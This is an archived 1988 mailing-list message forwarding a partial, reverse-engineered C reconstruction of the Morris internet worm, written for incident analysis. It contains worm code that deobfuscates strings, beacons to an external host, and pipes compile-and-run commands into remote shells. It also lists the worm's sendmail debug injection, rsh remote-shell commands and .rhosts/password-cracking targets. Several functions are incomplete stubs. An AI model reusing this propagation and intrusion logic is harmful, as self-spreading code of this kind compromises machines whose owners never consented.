|
|
ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #182 [[becker@trantor.harris-atd.com: C code for part of worm]] (1 message, 3941 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/182.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.
START OF DOCUMENT
From: Jean Marie Diaz <jdiaz%oracle%hplabs@hplabs.HP.COM>
To: phage
Date: Fri 17:11:57 04/11/1988 EST
Subject: [becker@trantor.harris-atd.com: C code for part of worm]
References:
[Thread Prev: 180]
[Thread Next: 187]
[Message Prev: 076]
[Message Next: 043]
------- Forwarded Message
Received: by ATHENA-PO-2.MIT.EDU (5.45/4.7) id AA07174; Fri, 4 Nov 88 12:15:37 EST
Received: by ATHENA.MIT.EDU (5.45/4.7) id AA14060; Fri, 4 Nov 88 12:15:58 EST
Received: by trantor.harris-atd.com (5.51/1.14)
id AA09158; Fri, 4 Nov 88 12:12:30 EST
Message-Id: <8811041712.AA09158@trantor.harris-atd.com>
Received: by disk.harris-atd.com (3.2/4.8) id AA01617; Fri, 4 Nov 88 12:11:58 EST
Date: Fri, 4 Nov 88 12:11:58 EST
From: Don Becker <becker@trantor.harris-atd.com>
To: sipb@athena.mit.edu
Subject: C code for part of worm
(I'm an old sipb member that was almost hit by the worm. I thought
you might be interested
Send mail for the up-to-minute version. I should be finished by this
evening.)
/*****************************************************************************\
* *
* File: worm.c *
* Author: Don Becker *
* Created: Thu Nov 3 17:16:10 1988 *
* Contents: Reverse engineered worm program that invaded ATD on 11/3/88 *
* *
******************************************************************************/
#include <stdio.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int nobjects = 0;
int pleasequit;
int nextw, nifs;
char *null_auth;
/* These are the strings that are 'xor'ed with 0x81 in the binary. */
char environ[50] = "";
char *sh = "sh";
char *env52 = "sh"; /* 0x20034, <environ+52> */
char *env55 = "-p";
char *env58 = "l1.c";
char *env63 = "sh";
char *env66 = "/tmp/.dump";
char *env77 = "128.32.137.13";
char *env91 = "127.0.0.1";
char *env102 = "/usr/ucb/netstat -r -n"; /* 0x20066 */
char *env125 = "r";
char *env127 = "%s%s";
char *XS();
struct ifses {
int l0, l4, l8, l12, l16, l20, l24;
short l28;
} ifs[30]; /* Arbitrary */
main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
int i, l1, pid_arg, j, cur_arg, l5;
long key; /* -28(fp) */
struct rlimit rl;
l1 = 0;
strcpy(argv[0], XS(&env52)); /* "sh" */
time(&key);
srandom(key);
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
;
signal(SIGPIPE, SIG_IGN);
pid_arg = 0;
cur_arg = 1;
if (argc > 2 &&
strcmp(argv[cur_arg], XS(&env55)) == 0) { /* env55 == "-p" */
pid_arg = atoi(argv[2]);
cur_arg += 2;
}
for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
if (loadobject(argv[i]) == 0)
exit(1);
if (pid_arg)
unlink(argv[i]);
}
if ((nobjects < 1) || (getobjectbyname(XS(&env58)) == 0)) /* "l1.c" */
exit(1);
if (pid_arg) {
for(i = 0; i < 32; i++)
close(i);
unlink(argv[0]);
unlink(XS(&env63)); /* "sh" */
unlink(XS(&env66)); /* "/tmp/.dumb" */
}
for (i = 1; i < argc; i++)
for (j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
if (if_init() == 0)
exit(1);
if (pid_arg) { /* main+600 */
if (pid_arg == getpgrp(getpid()))
setpgrp(getpid(), getpid());
kill(pid_arg, 9);
}
mainplus610();
} /* main+610 */
static mainplus610()
{
long key, time1, time0;
time(&key);
srandom(key);
time0 = key;
if (hg() == 0 && hl() == 0)
ha();
checkother();
XS_152();
cracksome();
other_sleep(30);
while (1) {
cracksome();
if (fork() > 0)
exit(0);
if (hg() == 0 && hi() == 0 && ha() == 0)
hl();
other_sleep(120);
time(&time1);
if (time1 - time0 >= 60*60*12)
h_clean();
if (pleasequit && nextw > 0)
exit(0);
}
}
static trans_cnt;
static char trans_buf[NCARGS];
char *XS(str1) /* 0x23fc */
char *str1;
{
int i, len;
char *newstr;
len = strlen(str1);
if (len + 1 > NCARGS - trans_cnt)
trans_cnt = 0;
newstr = &trans_buf[trans_cnt];
trans_cnt += 1 + len;
for (i = 0; str1[i]; i++)
newstr[i] = str1[i]^0x81;
newstr[i] = '\0';
return newstr;
}
static XSplus152(arg1, arg2) /* 0x2494 */
{
int s;
struct sockaddr soka;
char msg;
if (7 != random()/((short)15)) /* This needs fixed. It does not*/
return; /* produce the same div instn. */
bzero(&soka, sizeof(soka));
soka.sa_family = AF_INET;
/* What is going on here??? */
*((short *)soka.sa_data) = '],'; /* 0x2c5d */
*((int *)(&soka.sa_data[2])) =
inet_addr(XS(&env77)); /* "128.32.137.13" */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
if (sendto(s, &msg, 1, 0, &soka, sizeof(soka)))
;
close(s);
}
if_init() /* 0x254c */
{
int *l0, l1;
char foo[396];
int l408,l404,i;
int s, l392;
char foo1[60];
nifs = 0;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return 0; /* if_init+1042 */
l0 = &l392;
l1 = 384;
if (ioctl(s, 0xc0086914, &l1) < 0) { /* 192.8.105.20 ??? */
close(s);
return 0; /* if_init+1042 */
}
l404 = (l1< 0 ? l1+31 : l1) << 5;
for(i = 0; i < l404; i++) { /* if_init+144 */
l408 = 0;
if (l408 < nifs) {
;
}
}
}
def_netmask(net_addr) /* 0x2962 */
int net_addr;
{
if ((net_addr & 0x80000000) == 0)
return 0xFF000000;
if ((net_addr & 0xC0000000) == 0xC0000000)
return 0xFFFF0000;
return 0xFFFFFF00;
}
netmaskfor(addr) /* 0x29aa */
int addr;
{
int i, mask;
mask = def_netmask(addr);
for (i = 0; i < nifs; i++)
if ((addr & mask) == (ifs[i].l16 & mask))
return ifs[i].l24;
return mask;
}
int ngateways;
rt_init() /* 0x2a26 */
{
FILE *pipe;
char input_buf[64];
int l204, l304;
ngateways = 0;
pipe = popen(XS(&env102), XS(&env125)); /* "/usr/ucb/netstat -r -n", "r"*/
if (pipe == 0)
return 0;
while (fgets(input_buf, sizeof(input_buf), pipe)) { /* to 518 */
other_sleep(0);
if (ngateways >= 500)
break;
sscanf(input_buf, XS(&env127), l204, l304); /* "%s%s" */
/* other shit */
} /* 518, back to 76 */
pclose(pipe);
rt_init_plus_544();
return 1;
} /* 540 */
static rt_init_plus_544() /* 0x2c44 */
{
}
getaddrs() /* 0x2e1a */
{
}
a2in(a) /* 0x2f4a */
{
int in;
static local;
in = a;
*(&local) = *(&in);
return local;
}
x3a20(arg0, arg1, arg2)
{
char *object;
char local[40];
char print_buf[512]; /* l568 */
object = getobjectbyname(XS(&env201)); /* "l1.c" */
if (object == NULL)
return 0; /* <hi+2128> */
if (makemagic(arg0, l592, l580, l584, l588) == 0)
return 0;
waithit_plus1594(arg2, XS(&env206)); /* "PATH=/bin:/usr/bin:/usr/ucb\n" */
waithit_plus1594(arg2, XS(&env235)); /* "cd /usr/tmp\n" */
l576 = random() % 0x00FFFFFF;
sprintf(print_buf, XS(&env248), l576); /* "x%d.c" */
sprintf(&l516, XS(&env254), print_buf);
/* "echo gorch49;sed \'/int zz;/q\' > %s;echo gorch50\n" */
waithit_plus1594(arg2, &l516);
waithit_plus2412(arg1, XS(&env303), 10); /* "gorch49" */
xorbuf(object[8], object[4]);
l572 = write(arg2, object[8], object[4]);
xorbuf(object[8], object[4]);
if (object[4] != l572) {
close(l588);
return 0; /* to <hi+2128> */
}
waithit_plus1594(arg2, XS(&env311)); /* "int zz;\n\n" */
waithit_plus2412(arg1, XS(&env321), 30); /* "gorch50" */
sprintf(&l516, XS(&env329), l576, l576, l576,
inet_ntoa(a2in(l592, l580, l584, l576, l576)));
/* "cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE\n" */
waithit_plus1594(arg2, &l516);
if (waithit_plus2412(arg1, XS(&env387), 100) == 0) { /* "DONE" */
close(l588);
return 0; /* <hi+2128> */
}
return waithit(arg0, l592, l580, l584, l588);
}
waithit_plus12xx()
{} /* Does the 'cat' */
/* Installed as a signal handler */
justreturn(sig, code, scp) /* 0x4872 */
int sig, code;
struct sigcontext *scp;
{ }
struct mag {
short o0, o2;
int l4, l8, l12, l16, l20, l24, o28, o32, o36, o40, o44;
int o48[6];};
mail(arg0, arg1) /* 4d3c <permute+162>*/
struct mag arg1;
{
int i, l8, l12, l16, s;
struct sockaddr_in sin;
char local[544];
int l552, l556, l560, l564, l568;
if (makemagic(arg1, &l556, &l560, &l564, &l568) == 0)
return 0; /* <permute+1054> */
l552 = signal(SIGALRM, &justreturn);
for( i = 0; i < 6; i++) { /* to 430 */
if (arg1.o48[i] == NULL)
continue; /* to 422 */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
continue; /* to 422 */
bzero(&sin, sizeof(sin)); /* 16 */
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = arg1.o48[i];
sin.sin_port = IPPORT_SMTP;
alarm(10);
if (connect(s, &sin, sizeof(sin)) < 0) {
alarm(0);
close(s);
continue; /* to 422 */
}
alarm(0);
break;
}
if (i < 6)
return 0; /* 1054 */
if (permute_plus1058( s, &l548) == 0)
goto lp996;
}
char *text =
"default
0.0.0.0
127.0.0.1
exec /bin/sh
l1.c
PATH=/bin:/usr/bin:/usr/ucb
cd /usr/tmp
x%d.c
echo gorch49;sed '/int zz;/q' > %s;echo gorch50
gorch49
int zz;
gorch50
cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
DONE
x%d,%s
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then
P=x%d
else
P=sh
cc -o $P %s
./$P -p $$
rm -f $P
rm -f %s $P
l1.c
cd /usr/tmp
x%d.c
cat > %s <<'EOF'
cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
/usr/ucb/rsh
/usr/bin/rsh
/bin/rsh
/bin/echo %s
debug
mail from:</dev/null>
rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
data
quit
quit
exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
/bin/sh
/bin/sh
127.0.0.1
127.0.0.1
/etc/hosts.equiv
%.100s
/.rhosts
%.200s/.forward
%.20s%.20s
%[^ ,]
%*s %[^ ,]s
%.200s/.forward
%.200s/.rhosts
%s%s
/usr/dict/words";
------- End of Forwarded Message
------- End Forwarded Message
END OF DOCUMENT
| ISSN 1742-948X 01 (Online) | 2005/03/01 | Copyright 2002-2008 securitydigest.org. All rights reserved. |